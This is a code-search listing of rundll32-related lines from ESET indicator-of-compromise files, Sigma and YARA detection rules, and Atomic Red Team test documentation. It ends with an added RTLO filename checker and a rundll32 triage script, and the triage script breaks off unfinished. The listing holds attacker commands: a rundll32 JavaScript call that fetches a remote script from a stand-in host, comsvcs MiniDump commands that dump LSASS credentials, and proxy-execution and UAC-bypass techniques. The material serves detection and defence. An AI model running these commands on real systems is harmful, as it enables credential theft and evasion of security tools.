malware-ioc | misp-dukes-operation-ghost-event.json | "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", | © ESET 2014-2018 |
malware-ioc | misp-dukes-operation-ghost-event.json | "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", | © ESET 2014-2018 |
malware-ioc | misp-dukes-operation-ghost-event.json | "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", | © ESET 2014-2018 |
malware-ioc | invisimole.yar | $s13 = "rundll32.exe \"%s\",StartUI" | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "value": "%WINDIR%\\SysWOW64\\drivers\\Rundll32.exe", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "value": "Rundll32 - T1085", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\nAdversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the <code>C:\\Windows\\System32</code> directory. Examples of trusted binary names that can be given to malicious binaries include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binaries include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", | © ESET 2014-2018 |
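The RTLO trick in the masquerading description above, worked through as an added example (this is not code from the page, from ESET's repository or from MITRE). The functions report what a GUI file browser renders for a name that carries U+202E against the extension Windows actually dispatches on, and they flag every Unicode explicit bidi control, not only U+202E. The first two file names are the ones quoted in the description; the third is a constructed benign control.

```python
"""Added example (not from the original page, ESET or MITRE): expose right-to-left
override (RTLO) masquerading in file names. Sample names are constructed."""
import unicodedata
from pathlib import PureWindowsPath

RTLO = "\u202E"
# Bidi classes of the explicit directional controls (UAX #9). Any of them inside a
# file name is a red flag; U+202E (RLO) is just the one attackers use most.
BIDI_CONTROL_CLASSES = {"LRE", "RLE", "LRO", "RLO", "PDF", "LRI", "RLI", "FSI", "PDI"}


def displayed_name(name: str) -> str:
    """Approximate what a GUI renders: text after the first U+202E appears reversed.
    This simplifies full bidi layout but reproduces the cases quoted above."""
    head, rlo, tail = name.partition(RTLO)
    return head + tail[::-1] if rlo else name


def real_extension(name: str) -> str:
    """Extension the OS dispatches on: taken from the raw string, display order ignored."""
    return PureWindowsPath(name).suffix.lower()


def assess(name: str) -> dict:
    """Report displayed vs. real extension and every bidi control character present."""
    controls = sorted({f"U+{ord(c):04X}" for c in name
                       if unicodedata.bidirectional(c) in BIDI_CONTROL_CLASSES})
    shown = displayed_name(name)
    return {
        "raw": name,
        "displayed": shown,
        "displayed_extension": PureWindowsPath(shown).suffix.lower(),
        "real_extension": real_extension(name),
        "bidi_controls": controls,
        "suspicious": bool(controls),
    }


SAMPLES = [
    "March 25 \u202Excod.scr",    # renders as "March 25 rcs.docx", executes as .scr
    "photo_high_re\u202Egnp.js",  # renders as "photo_high_resj.png", executes as .js
    "quarterly_report.docx",      # constructed benign control
]

if __name__ == "__main__":
    for sample in SAMPLES:
        r = assess(sample)
        print(f"{r['displayed']!r:28} shown={r['displayed_extension']:6} "
              f"real={r['real_extension']:5} controls={r['bidi_controls']} suspicious={r['suspicious']}")
```

The check on `bidi_controls` is the one worth deploying on mail gateways and file-share scanners: the displayed-name reconstruction only exists to show the analyst why the name is deceptive.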
malware-ioc | misp_invisimole.json | "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", | © ESET 2014-2018 |
malware-ioc | invisimole | %WINDIR%\SysWOW64\drivers\Rundll32.exe | © ESET 2014-2018 |
malware-ioc | invisimole | "FlashConfigEnrollee" = "shell32 ShellExec_RunDLL "C:\Windows\SysWOW64\drivers\Rundll32.exe" "C:\Windows\SysWOW64\drivers\wdigest.dll",SpInitialize %SHELLCODE_BYTES%" | © ESET 2014-2018 |
malware-ioc | win_apt_invisimole_sminit_chain.yml | - 'rundll32.exe shell32.dll,ShellExec_RundDLL' | © ESET 2014-2018 |
malware-ioc | win_apt_invisimole_wdigest_chain.yml | CommandLine\|contains: 'rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt' | © ESET 2014-2018 |
malware-ioc | win_apt_invisimole_wdigest_chain.yml | - '\Windows\SysWOW64\drivers\Rundll32.exe' | © ESET 2014-2018 |
malware-ioc | win_apt_invisimole_wrapper_dll.yml | Image\|endswith: '\rundll32.exe' | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | title: Suspicious Execution of Rundll32.exe | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | description: Detects instances when Rundll32.exe is executed outside of the system folder, or when Rundll32.exe is unsigned. InvisiMole Group uses a Windows XP version of Rundll32.exe to load and exploit a vulnerable Windows XP library. As Rundll32.exe is signed by a catalog file, older versions will not be signed on newer OS versions which can trigger this detection. | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | - Rundll32.exe intentionally copied outside of the system folder. | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | - Legitimate use of older version of Rundll32.exe on newer OS | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | Image\|endswith: 'rundll32.exe' | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | - '\Windows\SysWOW64\rundll32.exe' | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | - '\Windows\system32\rundll32.exe' | © ESET 2014-2018 |
malware-ioc | win_suspicious_rundll32.yml | - 'rundll32.exe' | © ESET 2014-2018 |
malware-ioc | rtm | Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host | © ESET 2014-2018 |
malware-ioc | rtm | rundll32.exe | © ESET 2014-2018 |
atomic-red-team | index.md | - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - T1218.011 Rundll32 | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #2: Rundll32 execute VBscript command [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #3: Rundll32 advpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #10: Rundll32 with Ordinal Value [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #11: Rundll32 with Control_RunDLL [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #9: WMI Execute rundll32 [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1218.011 Rundll32 | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #2: Rundll32 execute VBscript command [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #3: Rundll32 advpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #10: Rundll32 with Ordinal Value [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #11: Rundll32 with Control_RunDLL [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #9: WMI Execute rundll32 [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | | | | | Rundll32 | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | | | | | | Rundll32 | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | T1003.md | C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full | MIT License. © 2018 Red Canary |
atomic-red-team | T1003.001.md | C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | <blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | - Atomic Test #9 - WMI Execute rundll32 | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | ## Atomic Test #9 - WMI Execute rundll32 | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | - Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | ## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | | rundll32_file_path | Location of rundll32.exe | Path | $env:windir\system32\rundll32.exe| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | # T1218.011 - Rundll32 | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | <blockquote>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #2 - Rundll32 execute VBscript command | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #3 - Rundll32 advpack.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #4 - Rundll32 ieadvpack.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #5 - Rundll32 syssetup.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #6 - Rundll32 setupapi.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #9 - Execution of non-dll using rundll32.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #10 - Rundll32 with Ordinal Value | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | - Atomic Test #11 - Rundll32 with Control_RunDLL | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #2 - Rundll32 execute VBscript command | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #3 - Rundll32 advpack.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with advpack.dll. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #4 - Rundll32 ieadvpack.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with ieadvpack.dll. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #5 - Rundll32 syssetup.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .#{inf_to_execute} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #6 - Rundll32 setupapi.dll Execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a window saying "installation failed" will be opened | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .#{inf_to_execute} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe URL.dll,FileProtocolHandler C:\..\Detail\akteullen.vbs | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #9 - Execution of non-dll using rundll32.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Rundll32.exe running non-dll | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe #{input_file}, StartW | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #10 - Rundll32 with Ordinal Value | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe #{input_file},#2 | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | ## Atomic Test #11 - Rundll32 with Control_RunDLL | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | rundll32.exe shell32.dll,Control_RunDLL #{input_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.015.md | This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.015.md | Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}' | MIT License. © 2018 Red Canary |
atomic-red-team | T1548.002.md | If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.006.md | rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init" | MIT License. © 2018 Red Canary |
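The Sigma rule win_suspicious_rundll32.yml above keys on where rundll32.exe runs from; the T1218.011 atomic tests, the comsvcs MiniDump commands and the YARA strings that follow show which module/export pairs and command-line shapes an analyst should recognise. The script below applies both ideas to Sysmon-style process-creation events. It is an added example, not code from the page, ESET, Red Canary or Microsoft: it tokenises the rundll32 command line (handling `dll,Entry`, `dll, Entry`, `dll Entry`, a quoted path with the comma inside the quotes, an ordinal `,#2` and `-sta {CLSID}`), then scores the image path, the module location, the export name and the script pseudo-protocols. The events, the PID, the dump path, the UNC printer path and the severity labels are this example's assumptions; the field names Image and CommandLine are the ones the Sigma rules use.

```python
"""Added example (not from the original page, ESET, Red Canary or Microsoft): triage
rundll32 process-creation events. Field names follow Sysmon Event ID 1 (Image,
CommandLine); every event below is constructed for the demo."""
from pathlib import PureWindowsPath

SYSTEM_DIRS = ("\\windows\\system32", "\\windows\\syswow64")
RANK = {"benign": 0, "low": 1, "medium": 2, "high": 3}

# (module basename, export) pairs from the atomic tests and YARA strings on this
# page; the severity labels are this example's own judgement.
NOTABLE_EXPORTS = {
    ("comsvcs.dll", "minidump"): ("high", "MiniDump dumps process memory (LSASS credential theft)"),
    ("shell32.dll", "shellexec_rundll"): ("high", "ShellExec_RunDLL proxies execution of an arbitrary program"),
    ("shell32.dll", "control_rundll"): ("medium", "Control_RunDLL loads a .cpl or other file as a Control Panel item"),
    ("url.dll", "openurl"): ("high", "OpenURL launches .hta/.url targets"),
    ("url.dll", "fileprotocolhandler"): ("high", "FileProtocolHandler opens a file with its registered handler"),
    ("pcwutl.dll", "launchapplication"): ("high", "LaunchApplication starts an executable"),
    ("advpack.dll", "launchinfsection"): ("high", "LaunchINFSection runs an .inf install section"),
    ("ieadvpack.dll", "launchinfsection"): ("high", "LaunchINFSection runs an .inf install section"),
    ("syssetup.dll", "setupinfobjectinstallaction"): ("high", "SetupInfObjectInstallAction runs an .inf section"),
    ("setupapi.dll", "installhinfsection"): ("high", "InstallHinfSection runs an .inf section"),
}


def split_windows_args(cmdline):
    """Split on whitespace outside double quotes and drop the quotes. Enough for
    rundll32 lines; it does not reproduce every CommandLineToArgvW backslash rule."""
    args, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_rundll32(cmdline):
    """Return (module, entry, remaining args) for the command-line forms seen above."""
    tokens = split_windows_args(cmdline)[1:]          # drop the rundll32 token itself
    if not tokens:
        return "", "", []
    if tokens[0].lower() in ("-sta", "/sta"):         # COM class instantiation form
        return "-sta", (tokens[1] if len(tokens) > 1 else ""), tokens[2:]
    module, _, entry = tokens.pop(0).partition(",")
    if not entry and tokens:                           # 'x.dll, Entry' or 'x.dll Entry'
        entry = tokens.pop(0).lstrip(",")
    return module, entry, tokens


def assess_event(event):
    """Score one event: image location first (the Sigma rule), then module and export."""
    image = event["Image"].lower()
    findings = []
    if not image.endswith(tuple(d + "\\rundll32.exe" for d in SYSTEM_DIRS)):
        findings.append(("high", "rundll32.exe running outside the system folders"))
    module, entry, args = parse_rundll32(event["CommandLine"])
    if module.lower().startswith(("javascript:", "vbscript:")):
        findings.append(("high", "script pseudo-protocol handed to mshtml RunHTMLApplication"))
    elif module == "-sta":
        findings.append(("medium", f"COM class {entry} instantiated via -sta"))
    elif module:
        name = PureWindowsPath(module).name.lower()
        if "." not in name:                            # LoadLibrary appends .dll itself
            name += ".dll"
        if (name, entry.lower()) in NOTABLE_EXPORTS:
            findings.append(NOTABLE_EXPORTS[(name, entry.lower())])
        if entry.startswith("#"):
            findings.append(("medium", f"export called by ordinal {entry}"))
        if PureWindowsPath(name).suffix not in (".dll", ".cpl"):
            findings.append(("medium", f"module {name} is not a DLL"))
        parent = str(PureWindowsPath(module).parent).lower()
        if parent != "." and not parent.endswith(SYSTEM_DIRS):
            findings.append(("medium", f"module loaded from {parent}"))
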